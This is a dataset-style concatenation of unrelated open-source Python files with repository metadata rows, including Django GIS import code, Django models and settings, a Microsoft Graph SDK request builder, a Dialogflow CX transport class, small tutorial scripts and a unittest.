return {self.unique: kwargs[self.unique]}
else:
return {fld: kwargs[fld] for fld in self.unique}
# #### Verification routines used in constructing model keyword arguments. ####
def verify_ogr_field(self, ogr_field, model_field):
"""
Verifies if the OGR Field contents are acceptable to the Django
model field. If they are, the verified value is returned,
otherwise the proper exception is raised.
"""
if (isinstance(ogr_field, OFTString) and
isinstance(model_field, (models.CharField, models.TextField))):
if self.encoding:
# The encoding for OGR data sources may be specified here
# (e.g., 'cp437' for Census Bureau boundary files).
val = force_text(ogr_field.value, self.encoding)
else:
val = ogr_field.value
if model_field.max_length and len(val) > model_field.max_length:
raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
(model_field.name, model_field.max_length, len(val)))
elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
try:
# Creating an instance of the Decimal value to use.
d = Decimal(str(ogr_field.value))
except DecimalInvalidOperation:
raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)
# Getting the decimal value as a tuple.
dtup = d.as_tuple()
digits = dtup[1]
d_idx = dtup[2] # index where the decimal is
# Maximum amount of precision, or digits to the left of the decimal.
max_prec = model_field.max_digits - model_field.decimal_places
# Getting the digits to the left of the decimal place for the
# given decimal.
if d_idx < 0:
n_prec = len(digits[:d_idx])
else:
n_prec = len(digits) + d_idx
# If we have more than the maximum digits allowed, then throw an
# InvalidDecimal exception.
if n_prec > max_prec:
raise InvalidDecimal(
'A DecimalField with max_digits %d, decimal_places %d must '
'round to an absolute value less than 10^%d.' %
(model_field.max_digits, model_field.decimal_places, max_prec)
)
val = d
elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
# Attempt to convert any OFTReal and OFTString value to an OFTInteger.
try:
val = int(ogr_field.value)
except ValueError:
raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
else:
val = ogr_field.value
return val
def verify_fk(self, feat, rel_model, rel_mapping):
"""
Given an OGR Feature, the related model and its dictionary mapping,
this routine will retrieve the related model for the ForeignKey
mapping.
"""
# TODO: It is expensive to retrieve a model for every record --
# explore if an efficient mechanism exists for caching related
# ForeignKey models.
# Constructing and verifying the related model keyword arguments.
fk_kwargs = {}
for field_name, ogr_name in rel_mapping.items():
fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))
# Attempting to retrieve and return the related model.
try:
return rel_model.objects.using(self.using).get(**fk_kwargs)
except ObjectDoesNotExist:
raise MissingForeignKey(
'No ForeignKey %s model found with keyword arguments: %s' %
(rel_model.__name__, fk_kwargs)
)
def verify_geom(self, geom, model_field):
"""
Verifies the geometry -- will construct and return a GeometryCollection
if necessary (for example if the model field is MultiPolygonField while
the mapped shapefile only contains Polygons).
"""
# Downgrade a 3D geom to a 2D one, if necessary.
if self.coord_dim != geom.coord_dim:
geom.coord_dim = self.coord_dim
if self.make_multi(geom.geom_type, model_field):
# Constructing a multi-geometry type to contain the single geometry
multi_type = self.MULTI_TYPES[geom.geom_type.num]
g = OGRGeometry(multi_type)
g.add(geom)
else:
g = geom
# Transforming the geometry with our Coordinate Transformation object,
# but only if the class variable `transform` is set w/a CoordTransform
# object.
if self.transform:
g.transform(self.transform)
# Returning the WKT of the geometry.
return g.wkt
# #### Other model methods ####
def coord_transform(self):
"Returns the coordinate transformation object."
SpatialRefSys = self.spatial_backend.spatial_ref_sys()
try:
# Getting the target spatial reference system
target_srs = SpatialRefSys.objects.using(self.using).get(srid=self.geo_field.srid).srs
# Creating the CoordTransform object
return CoordTransform(self.source_srs, target_srs)
except Exception as msg:
new_msg = 'Could not translate between the data source and model geometry: %s' % msg
six.reraise(LayerMapError, LayerMapError(new_msg), sys.exc_info()[2])
def geometry_field(self):
"Returns the GeometryField instance associated with the geographic column."
# Use `get_field()` on the model's options so that we
# get the correct field instance if there's model inheritance.
opts = self.model._meta
return opts.get_field(self.geom_field)
def make_multi(self, geom_type, model_field):
"""
Given the OGRGeomType for a geometry and its associated GeometryField,
determine whether the geometry should be turned into a GeometryCollection.
"""
return (geom_type.num in self.MULTI_TYPES and
model_field.__class__.__name__ == 'Multi%s' % geom_type.django)
def save(self, verbose=False, fid_range=False, step=False,
progress=False, silent=False, stream=sys.stdout, strict=False):
"""
Saves the contents from the OGR DataSource Layer into the database
according to the mapping dictionary given at initialization.
Keyword Parameters:
verbose:
If set, information will be printed subsequent to each model save
executed on the database.
fid_range:
May be set with a slice or tuple of (begin, end) feature ID's to map
from the data source. In other words, this keyword enables the user
to selectively import a subset range of features in the geographic
data source.
step:
If set with an integer, transactions will occur at every step
interval. For example, if step=1000, a commit would occur after
the 1,000th feature, the 2,000th feature etc.
progress:
When this keyword is set, status information will be printed giving
the number of features processed and successfully saved. By default,
progress information will pe printed every 1000 features processed,
however, this default may be overridden by setting this keyword with an
integer for the desired interval.
stream:
Status information will be written to this file handle. Defaults to
using `sys.stdout`, but any object with a `write` method is supported.
silent:
By default, non-fatal error notifications are printed to stdout, but
this keyword may be set to disable these notifications.
strict:
Execution of the model mapping will cease upon the first error
encountered. The default behavior is to attempt to continue.
"""
# Getting the default Feature ID range.
default_range = self.check_fid_range(fid_range)
# Setting the progress interval, if requested.
if progress:
if progress is True or not isinstance(progress, int):
progress_interval = 1000
else:
progress_interval = progress
def _save(feat_range=default_range, num_feat=0, num_saved=0):
if feat_range:
layer_iter = self.layer[feat_range]
else:
layer_iter = self.layer
for feat in layer_iter:
num_feat += 1
# Getting the keyword arguments
try:
kwargs = self.feature_kwargs(feat)
except LayerMapError as msg:
# Something borked the validation
if strict:
raise
elif not silent:
stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
else:
# Constructing the model using the keyword args
is_update = False
if self.unique:
# If we want unique models on a particular field, handle the
# geometry appropriately.
try:
# Getting the keyword arguments and retrieving
# the unique model.
u_kwargs = self.unique_kwargs(kwargs)
m = self.model.objects.using(self.using).get(**u_kwargs)
is_update = True
# Getting the geometry (in OGR form), creating
# one from the kwargs WKT, adding in additional
# geometries, and update the attribute with the
# just-updated geometry WKT.
geom = getattr(m, self.geom_field).ogr
new = OGRGeometry(kwargs[self.geom_field])
for g in new:
geom.add(g)
setattr(m, self.geom_field, geom.wkt)
except ObjectDoesNotExist:
# No unique model exists yet, create.
m = self.model(**kwargs)
else:
m = self.model(**kwargs)
try:
# Attempting to save.
m.save(using=self.using)
num_saved += 1
if verbose:
stream.write('%s: %s\n' % ('Updated' if is_update else 'Saved', m))
except Exception as msg:
if strict:
# Bailing out if the `strict` keyword is set.
if not silent:
stream.write(
'Failed to save the feature (id: %s) into the '
'model with the keyword arguments:\n' % feat.fid
)
stream.write('%s\n' % kwargs)
raise
elif not silent:
stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))
# Printing progress information, if requested.
if progress and num_feat % progress_interval == 0:
stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))
# Only used for status output purposes -- incremental saving uses the
# values returned here.
return num_saved, num_feat
if self.transaction_decorator is not None:
_save = self.transaction_decorator(_save)
nfeat = self.layer.num_feat
if step and isinstance(step, int) and step < nfeat:
# Incremental saving is requested at the given interval (step)
if default_range:
raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
beg, num_feat, num_saved = (0, 0, 0)
indices = range(step, nfeat, step)
n_i = len(indices)
for i, end in enumerate(indices):
# Constructing the slice to use for this step; the last slice is
# special (e.g, [100:] instead of [90:100]).
if i + 1 == n_i:
step_slice = slice(beg, None)
else:
step_slice = slice(beg, end)
try:
num_feat, num_saved = _save(step_slice, num_feat, num_saved)
beg = end
except Exception: # Deliberately catch everything
stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
raise
else:
# Otherwise, just calling the previously defined _save() function.
_save()
| [
"root@debian"
] | root@debian |
55b52b8988367a4f538993e31d1b68bc5744700d | 636fae2d4fa7108c3cc30d55c9feef6dfd334cd8 | /NestedSerializer/api/models.py | d8890ec995bbea37c679ff6e986db7c5e1f2e14e | [] | no_license | anupjungkarki/Django-RESTFramework | 4ee3f5a46a98854284b45545d751822e27a715e1 | dc774c234de09f7e26c7fd5b84ba9359ecc75861 | refs/heads/master | 2023-02-15T02:34:46.421764 | 2021-01-11T08:04:15 | 2021-01-11T08:04:15 | 327,276,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | from django.db import models
# Create your models here.
class Singer(models.Model):
name = models.CharField(max_length=100)
gender = models.CharField(max_length=100)
def __str__(self):
return self.name
class Track(models.Model):
title = models.CharField(max_length=100)
singer = models.ForeignKey(Singer, on_delete=models.CASCADE, related_name='song')
album = models.CharField(max_length=100)
duration = models.IntegerField()
def __str__(self):
return self.title
| [
"anupkarki2012@gmail.com"
] | anupkarki2012@gmail.com |
c80f313a023ea0d6910870d6c5fbb40985a35628 | 00faae803cfa2e5c2f5e662f560eb61bd0074690 | /src/python2/request/item_attachment_request_builder.py | 998217a7f8acc20f524fc5a161c255abfc56cb1c | [
"MIT"
] | permissive | gojohnkevin/msgraph-sdk-python | 6dc00723489eddf013cff82d34d86d677b4d7ecf | 7714c11043e76e856876dd731c6c1df7b37cdbef | refs/heads/master | 2022-07-09T14:35:30.422531 | 2022-06-23T15:52:17 | 2022-06-23T15:52:17 | 85,160,734 | 0 | 1 | null | 2017-03-16T06:29:59 | 2017-03-16T06:29:59 | null | UTF-8 | Python | false | false | 3,157 | py | # -*- coding: utf-8 -*-
"""
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
"""
from __future__ import unicode_literals
from .item_attachment_request import ItemAttachmentRequest
from ..request_builder_base import RequestBuilderBase
from ..request import outlook_item_request_builder
class ItemAttachmentRequestBuilder(RequestBuilderBase):
def __init__(self, request_url, client):
"""Initialize the ItemAttachmentRequestBuilder
Args:
request_url (str): The url to perform the ItemAttachmentRequest
on
client (:class:`GraphClient<microsoft.msgraph.request.graph_client.GraphClient>`):
The client which will be used for the request
"""
super(ItemAttachmentRequestBuilder, self).__init__(request_url, client)
def request(self, expand=None, select=None, options=None):
"""Builds the ItemAttachmentRequest
Args:
expand (str): Default None, comma-separated list of relationships
to expand in the response.
select (str): Default None, comma-separated list of properties to
include in the response.
options (list of :class:`Option<microsoft.msgraph.options.Option>`):
A list of options to pass into the request. Defaults to None.
Returns:
:class:`ItemAttachmentRequest<microsoft.msgraph.request.item_attachment_request.ItemAttachmentRequest>`:
The ItemAttachmentRequest
"""
req = ItemAttachmentRequest(self._request_url, self._client, options)
req._set_query_options(expand=expand, select=select)
return req
def delete(self):
"""Deletes the specified ItemAttachment."""
self.request().delete()
def get(self):
"""Gets the specified ItemAttachment.
Returns:
:class:`ItemAttachment<microsoft.msgraph.model.item_attachment.ItemAttachment>`:
The ItemAttachment.
"""
return self.request().get()
def update(self, item_attachment):
"""Updates the specified ItemAttachment.
Args:
item_attachment (:class:`ItemAttachment<microsoft.msgraph.model.item_attachment.ItemAttachment>`):
The ItemAttachment to update.
Returns:
:class:`ItemAttachment<microsoft.msgraph.model.item_attachment.ItemAttachment>`:
The updated ItemAttachment
"""
return self.request().update(item_attachment)
@property
def item(self):
"""The item for the ItemAttachmentRequestBuilder
Returns:
:class:`OutlookItemRequestBuilder<microsoft.msgraph.request.outlook_item_request.OutlookItemRequestBuilder>`:
A request builder created from the ItemAttachmentRequestBuilder
"""
return outlook_item_request_builder.OutlookItemRequestBuilder(self.append_to_request_url("item"), self._client)
| [
"robert.anderson@microsoft.com"
] | robert.anderson@microsoft.com |
67ac08f194336d675fc9d64d633658f8fd86b045 | 8f6a9ff4c63fd24d145088077d5da1c3e4caaa3a | /code/fv_show.py | bec775f7e12c9d5a361048b6fb24b83528b2fb7c | [] | no_license | liaofuwei/pythoncoding | 6fd2afba0d27c4a4bbb4b2d321b3fa402a60d6fe | 966bd99459be933cf48287412a40e0c7a3d0b8e5 | refs/heads/master | 2021-07-15T10:34:57.701528 | 2017-10-10T05:27:13 | 2017-10-10T05:27:13 | 107,651,470 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | import numpy as np
from matplotlib.pyplot import *
from pylab import *
pv=1000
r=0.08
t=linspace(0,10,10)
fv=pv*(1+r)**t
plot(t,fv)
show()
| [
"459193023@qq.com"
] | 459193023@qq.com |
a248fff8e70b831ad000f09123fad1ffa2eeeac6 | c1b8ff60ed4d8c70e703f71b7c96a649a75c0cec | /ostPython2/FTL_tester.py | ed22531b4ea6f2f193bd5c2a0186bb3d3106022b | [] | no_license | deepbsd/OST_Python | 836d4fae3d98661a60334f66af5ba3255a0cda5c | b32f83aa1b705a5ad384b73c618f04f7d2622753 | refs/heads/master | 2023-02-14T17:17:28.186060 | 2023-01-31T02:09:05 | 2023-01-31T02:09:05 | 49,534,454 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,800 | py | #!/usr/local/bin/python3
#
# File Type Lister Tester (FTL_tester.py)
# (tests FileTypeLister.py module)
#
# by David S. Jackson
# for OST Python 2 on Jan 15, 2015
#
# Instructor Pat Barton
#
"""This program calls the unittest module and tests the accuracy
of the program called FileTypeLister.py. This module lists all
files in the designated directory (dirpath) by suffix and counts
the number of occurances for each file type according to suffix.
This unittest tests the accuracy of that program with some tests.
"""
import os
import glob
import random
import unittest
import tempfile
import FileTypeLister
suf = ['.py','.txt','.doc','.wp','.lts','.gpg','.jpg',\
'.gif','.html','.pl','.sh','.mp3','.mp4','.bin']
bname = ['one','two','three','four','five','six',\
'seven','eight','nine','ten','eleven','twelve']
class TestFTL(unittest.TestCase):
"""Tests the FileTypeLister.py program."""
def setUp(self):
"""Creates a temp dir full of files with various \
suffixes using the randint() function
"""
global file_count
file_count = random.randint(20, 50)
#print("File count is {}".format(file_count)) # debugging
global dirname
dirname = tempfile.mkdtemp("tempdir")
os.chdir(dirname)
for filenum in range(0, file_count):
for suf_idx in range(0, len(suf)):
for bn_idx in range(0, len(bname)):
filename = bname[bn_idx]+str(filenum)+suf[suf_idx]
#print(filename) # debugging
f = open(filename, 'w')
f.write("whatever whatever whatever\n")
f.close()
def test_1(self):
"""Verify that total files listed in tempdir is correct
and agrees with suf_dict
"""
ftl_total = 0
suf_dict = FileTypeLister.listFiles(dirname)
for value in suf_dict.values():
ftl_total = ftl_total + int(value)
total_files = len(bname) * len(suf) * file_count
self.assertEqual(ftl_total, total_files, "Doesn't list correct number of files.")
def test_2(self):
"Verify that suf_dict is accurate for files in tempdir"
suf_dict = FileTypeLister.listFiles(dirname)
for suffix, value in suf_dict.items():
self.assertEqual(suf_dict[suffix], len(bname)*file_count, "Totals wrong for {}".format(suf_dict[suffix]))
def tearDown(self):
os.chdir(dirname)
testfiles = glob.glob('*')
for fn in testfiles:
os.remove(fn)
try:
os.rmdir(dirname)
except OSError:
pass
if __name__ == "__main__":
unittest.main()
| [
"deepbsd@yahoo.com"
] | deepbsd@yahoo.com |
7e411cb789425e93b5e414dc5fe79e491c5a3eac | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/dialogflow/cx/v3/dialogflow-cx-v3-py/google/cloud/dialogflowcx_v3/services/agents/transports/base.py | 48cfc1c41a55ee13a499105dde3b235955c93c4d | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,003 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.dialogflowcx_v3.types import agent
from google.cloud.dialogflowcx_v3.types import agent as gcdc_agent
from google.longrunning import operations_pb2 as operations # type: ignore
from google.protobuf import empty_pb2 as empty # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
'google-cloud-dialogflowcx',
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class AgentsTransport(abc.ABC):
"""Abstract transport class for Agents."""
AUTH_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
)
def __init__(
self, *,
host: str = 'dialogflow.googleapis.com',
credentials: credentials.Credentials = None,
credentials_file: typing.Optional[str] = None,
scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
quota_project_id: typing.Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scope (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ':' not in host:
host += ':443'
self._host = host
# Save the scopes.
self._scopes = scopes or self.AUTH_SCOPES
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise exceptions.DuplicateCredentialArgs("'credentials_file' and 'credentials' are mutually exclusive")
if credentials_file is not None:
credentials, _ = auth.load_credentials_from_file(
credentials_file,
scopes=self._scopes,
quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = auth.default(scopes=self._scopes, quota_project_id=quota_project_id)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.list_agents: gapic_v1.method.wrap_method(
self.list_agents,
default_timeout=None,
client_info=client_info,
),
self.get_agent: gapic_v1.method.wrap_method(
self.get_agent,
default_timeout=None,
client_info=client_info,
),
self.create_agent: gapic_v1.method.wrap_method(
self.create_agent,
default_timeout=None,
client_info=client_info,
),
self.update_agent: gapic_v1.method.wrap_method(
self.update_agent,
default_timeout=None,
client_info=client_info,
),
self.delete_agent: gapic_v1.method.wrap_method(
self.delete_agent,
default_timeout=None,
client_info=client_info,
),
self.export_agent: gapic_v1.method.wrap_method(
self.export_agent,
default_timeout=None,
client_info=client_info,
),
self.restore_agent: gapic_v1.method.wrap_method(
self.restore_agent,
default_timeout=None,
client_info=client_info,
),
self.validate_agent: gapic_v1.method.wrap_method(
self.validate_agent,
default_timeout=None,
client_info=client_info,
),
self.get_agent_validation_result: gapic_v1.method.wrap_method(
self.get_agent_validation_result,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def list_agents(self) -> typing.Callable[
[agent.ListAgentsRequest],
typing.Union[
agent.ListAgentsResponse,
typing.Awaitable[agent.ListAgentsResponse]
]]:
raise NotImplementedError()
@property
def get_agent(self) -> typing.Callable[
[agent.GetAgentRequest],
typing.Union[
agent.Agent,
typing.Awaitable[agent.Agent]
]]:
raise NotImplementedError()
@property
def create_agent(self) -> typing.Callable[
[gcdc_agent.CreateAgentRequest],
typing.Union[
gcdc_agent.Agent,
typing.Awaitable[gcdc_agent.Agent]
]]:
raise NotImplementedError()
@property
def update_agent(self) -> typing.Callable[
[gcdc_agent.UpdateAgentRequest],
typing.Union[
gcdc_agent.Agent,
typing.Awaitable[gcdc_agent.Agent]
]]:
raise NotImplementedError()
@property
def delete_agent(self) -> typing.Callable[
[agent.DeleteAgentRequest],
typing.Union[
empty.Empty,
typing.Awaitable[empty.Empty]
]]:
raise NotImplementedError()
@property
def export_agent(self) -> typing.Callable[
[agent.ExportAgentRequest],
typing.Union[
operations.Operation,
typing.Awaitable[operations.Operation]
]]:
raise NotImplementedError()
@property
def restore_agent(self) -> typing.Callable[
[agent.RestoreAgentRequest],
typing.Union[
operations.Operation,
typing.Awaitable[operations.Operation]
]]:
raise NotImplementedError()
@property
def validate_agent(self) -> typing.Callable[
[agent.ValidateAgentRequest],
typing.Union[
agent.AgentValidationResult,
typing.Awaitable[agent.AgentValidationResult]
]]:
raise NotImplementedError()
@property
def get_agent_validation_result(self) -> typing.Callable[
[agent.GetAgentValidationResultRequest],
typing.Union[
agent.AgentValidationResult,
typing.Awaitable[agent.AgentValidationResult]
]]:
raise NotImplementedError()
__all__ = (
'AgentsTransport',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
8d4472313788528fd9bfe6d9946eaddceff01a1e | f3b233e5053e28fa95c549017bd75a30456eb50c | /bace_input/L4L/4L-3K_MD_NVT_rerun/set_5.py | 3e085633cdd1777fcdab3329d33720e37d1264e9 | [] | no_license | AnguseZhang/Input_TI | ddf2ed40ff1c0aa24eea3275b83d4d405b50b820 | 50ada0833890be9e261c967d00948f998313cb60 | refs/heads/master | 2021-05-25T15:02:38.858785 | 2020-02-18T16:57:04 | 2020-02-18T16:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 740 | py | import os
dir = '/mnt/scratch/songlin3/run/bace/L4L/MD_NVT_rerun/ti_one-step/4L_3K/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_5.in'
temp_pbs = filesdir + 'temp_5.pbs'
lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
os.chdir("%6.5f" %(j))
workdir = dir + "%6.5f" %(j) + '/'
#prodin
prodin = workdir + "%6.5f_prod_5.in" %(j)
os.system("cp %s %s" %(temp_prodin, prodin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, prodin))
#PBS
pbs = workdir + "%6.5f_5.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#submit pbs
#os.system("qsub %s" %(pbs))
os.chdir(dir)
| [
"songlin3@msu.edu"
] | songlin3@msu.edu |
53735cbef4d7f81e2d0940a29b398aa16adfcbe7 | 11f51735176e90f522db8d8250fcac4e28d03367 | /python_basic/ds-10.py | 2ea8e0d6259f9855dacc0e5aa76b02dfacedd5b7 | [] | no_license | schw240/Fastcampus_secondtest | 6d253c9d8e360e0f7c8927c902747981f452bbb6 | d89dc6d7dd031266abc6c0b51e51761c940123a4 | refs/heads/main | 2023-03-21T04:21:21.515959 | 2021-03-09T12:46:07 | 2021-03-09T12:46:07 | 340,637,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,220 | py | # 해쉬 테이블
# 키에 데이터를 저장하는 데이터 구조
# 파이썬은 딕셔너리가 해쉬로 구현되어있으므로 별도로 구현할 필요없음
# 간단하게 hash table 구현하기
hash_table = list([0 for i in range(10)])
#print(hash_table)
# 간단한 해쉬함수
# 가장 간단한 방식인 Division 방법(나누기를 통한 나머지 값을 사용하는 기법)
def hash_func(key):
return key % 5
# 해쉬 테이블에 저장해보기
# 데이터에 따라 필요시 key 생성 방법 정의
data1 = "Andy"
data2 = "Dave"
data3 = "Trump"
# ord(): 문자의 ASCII(아스키) 코드 리턴
print(ord(data1[0]), ord(data2[0]), ord(data3[0]))
print(ord(data1[0]), hash_func(ord(data1[0])))
# 해쉬 테이블에 값 저장 예
# data:value 와 같이 data와 value를 넣으면 해당 data에 대한 key를
# 찾아서 해당 key에 대응하는 해쉬 주소에 value를 저장하는 예
def storage_data(data, value):
key = ord(data[0])
hash_address = hash_func(key)
hash_table[hash_address] = value
# 실제 데이터를 저장하고 읽어보기
def get_data(data):
key = ord(data[0])
hash_address = hash_func(key)
return hash_table[hash_address]
| [
"schw240@gmail.com"
] | schw240@gmail.com |
112511cf83912aae4b88c376b5789ef936473501 | ae4d4087fd03511be038e4c2c8959a2f64f79198 | /doc/misc_plots/nonstationary_phase_plot.py | 2afaa337fe8f888d113810f179aa0a4eeb82ef33 | [] | no_license | jaidevd/pytftb | 88a6a829bd9bf83dc358604f9463189b75513542 | daa5a171ac0d53af0b81c1afd1267f8016bb8fc4 | refs/heads/master | 2021-07-16T18:50:44.302042 | 2021-06-28T06:26:03 | 2021-06-28T06:26:03 | 25,037,207 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from tftb.generators import fmlin, amgauss
import numpy as np
import matplotlib.pyplot as plt
y_nonstat, _ = fmlin(2048) # Already analytic, no need of Hilbert transorm
y_nonstat *= amgauss(2048)
plt.plot(np.real(y_nonstat), np.imag(y_nonstat))
plt.xlabel("Real part")
plt.ylabel("Imaginary part")
plt.show()
| [
"deshpande.jaidev@gmail.com"
] | deshpande.jaidev@gmail.com |
d2037a1236a4acc57abdf3ddd0792e134f3e7ba6 | 3ea1a45f61932ae0e8b504beb137be2a7c303d06 | /例子-0819-05.函数的返回值.py | 25edb9a4351c71de01443432766084d826f064f0 | [] | no_license | blackplusy/0810 | 8e650f7ce0e5d93b30e266bc7eef13491e588881 | e91290a1b0bea9966a85808935837f9af861f86f | refs/heads/master | 2022-12-14T11:12:27.585683 | 2020-09-05T08:29:49 | 2020-09-05T08:29:49 | 286,350,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | #coding=utf-8
#1.一个返回值
#定义sum函数,需要传入2个参数
def sum(a,b):
#业务逻辑,相加
jisuan=a+b
#返回计算结果
return jisuan
#通过变量接收函数操作后的结果,注意,一定要传入2个参数
a=sum(20,30)
print(a)
#2.多个返回值
def ret(a,b):
a*=10
b*=100
return a,b
num=ret(3,7)
print(num)
print(type(num))
num1,num2=ret(10,20)
print(num1,num2)
| [
"noreply@github.com"
] | blackplusy.noreply@github.com |
c7d15d2d77af850d7e49a03f2d46dbb68ed9f81a | fa8011b6942cac7b23d2dc781f7ae16d2cfab7f2 | /gravoicy/config/settings_local.py | 554622a9e704c6cbfa4d4071777e3fd73ca0964f | [] | no_license | indexofire/gravoicy | be99ae4995e81bf823841857742e60d689f20b1b | a516af5ec67e720ea2f1f695f28afadfb938cff4 | refs/heads/master | 2020-05-18T12:53:55.020633 | 2011-03-24T15:07:05 | 2011-03-24T15:07:05 | 948,414 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,569 | py | # -*- coding: utf-8 -*-
import os
from settings import PROJECT_PATH
from config.settings_base import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
SECRET_KEY = '1F=(lta=1R9je3ze@g#fa^m#hJu^mv%@8+%fZ5p)*1$(*tvbh6'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '../../grav_data.db',
'OPTIONS': {
'timeout': 10,
}
}
}
FEINCMS_ADMIN_MEDIA = '/media/feincms/'
TIME_ZONE = 'Asia/Shanghai'
LANGUAGE_CODE = 'zh-cn'
INTERNAL_IPS = (
'127.0.0.1',
)
MIDDLEWARE_CLASSES += (
'pagination.middleware.PaginationMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS += (
'forum.context_processors.page_size',
)
INSTALLED_APPS += (
'registration',
'base',
#'taggit',
#'voting',
#'blog',
'forum',
#'cms',
#'wiki',
'debug_toolbar',
#'redis_sessions',
'feincms',
'feincms.module.page',
'feincms.module.medialibrary',
'mptt',
'attachment',
#'simpleavatar',
'avatar',
#'userprofile',
'pagination',
'notification',
'content_ext.googlemap',
'account',
'registration',
'categories',
'editor',
)
FEINCMS_TREE_EDITOR_INCLUDE_ANCESTORS = True
#SESSION_ENGINE = 'utils.sessions.backends.redis'
FORUM_CTX_CONFIG = {
'FORUM_TITLE': 'HZCDCLabs Forum',
'FORUM_SUB_TITLE': '',
'FORUM_PAGE_SIZE': 50,
'TOPIC_PAGE_SIZE': 2,
}
SITE_NAME = 'HZCDC'
SITE_SUB_NAME = 'Labs'
MARKUP_CODE_HIGHTLIGHT = True
MARKITUP_JS_URL = '/media/markitup/sets/default/set.js'
| [
"indexofire@gmail.com"
] | indexofire@gmail.com |
5a9db80ab7d58772f4e96ff0ac9215bcd6c3eaf3 | fbe1718ba12e41d45524fa2966087d9f24ae18c3 | /pydal/parsers/sqlite.py | ea2331cc4617cd10dbe4fde350160cc02b923d21 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | michele-comitini/pydal | b5ab988c7ce1ea149128bc70d9f133700f7a0de3 | b6cd09a8bb1c3a27cdcd02297453f74d4380e79c | refs/heads/master | 2020-12-25T05:07:52.401623 | 2016-05-26T02:17:01 | 2016-05-26T02:17:01 | 30,265,122 | 0 | 0 | null | 2015-02-03T21:19:56 | 2015-02-03T21:19:55 | Python | UTF-8 | Python | false | false | 531 | py | from decimal import Decimal
from ..adapters.sqlite import SQLite
from .base import ListsParser, TimeParser, JSONParser
